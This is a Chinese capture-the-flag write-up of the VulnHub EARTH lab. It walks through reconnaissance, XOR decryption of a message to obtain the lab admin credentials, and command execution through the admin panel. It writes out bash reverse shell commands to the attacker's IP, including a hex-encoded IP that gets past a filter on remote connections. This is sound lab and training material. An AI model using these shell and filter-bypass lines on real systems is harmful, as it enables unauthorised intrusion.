vulnhub:EARTH靶机

发布于:2022-12-19 ⋅ 阅读:(558) ⋅ 点赞:(0)

kali攻击者ip:192.168.72.128

靶机ip162.168.72.147

1、先扫描主机名

2、探测此主机开放的端口服务

发现443端口有两个dns解析,在hosts添加dns解析

3、收集信息

①先访问一下earth.local域名,发现有之前的信息

扫描此域名下的目录

进入amdin目录看看,是个登录界面

②再去看另一个域名terratest.earth.local情况

探测web目录下有哪些

发现有两个目录可以访问,尝试看下robots.txt内容

发现有个testingnotes文件,但是不知道是何种格式,自己尝试测试发现是txt文件格式

翻译下内容如下

测试安全消息系统注意事项:

*使用XOR加密作为算法,应该是安全的RSA使用。

*地球已经确认他们收到了我们发送的信息。

*testdata.txt用于测试加密。

*terra被用作管理门户的用户名。

待办事项:

*我们如何将每月的密钥安全地发送到地球?或者我们应该每周换一次钥匙?

*需要测试不同长度的键来防止暴力。钥匙应该有多长?

*需要改进的消息界面和管理面板的界面,它目前是非常基本的。

从上面内容得到了一个信息,加密算法是xor,有个testdata.txt文件,用户名是terra

翻译// 根据辐射定年法和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,海洋中出现了生命,并开始影响地球的大气和表面,导致厌氧生物的激增,后来又出现了好氧生物。一些地质证据表明,生命可能早在41亿年前就出现了。

使用这个文件内容用xor加密方式与之前的消息运算。需要先将文件内容转化16进制再运算

16进制解密得到

用户名:terra  密码:earthclimatechangebad4humans 登录admin网页成功,可以执行命令

查找指定flag文件有哪些

查看此文本的内容,得到第一个flag

4、信息利用

使用反弹shell链接到靶机

bash -i >& /dev/tcp/192.168.72.128/77770>&1

反弹shell不成功。

发现是禁止远程链接,发现需要对ip地址进行16进制的转化绕过。

bash -i >& /dev/tcp/0xc0.0xa8.0x48.0x80/7777 0>&1

查看到攻击者拿到shell,链接成功。

5、进行信息提权

查看有哪些可以利用的权限

观察到有文件是root 尝试运行,发现报错

翻译为:检查是否存在重置触发器...重置失败,所有触发器都不存在。

本地没有调试命令,使用nc传送到本地调试一下

先给这个文件赋予执行的权限,再进行调试

在靶机上创建这三个文件

运行得到密码

切换root用户,输入密码

查看到flag

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到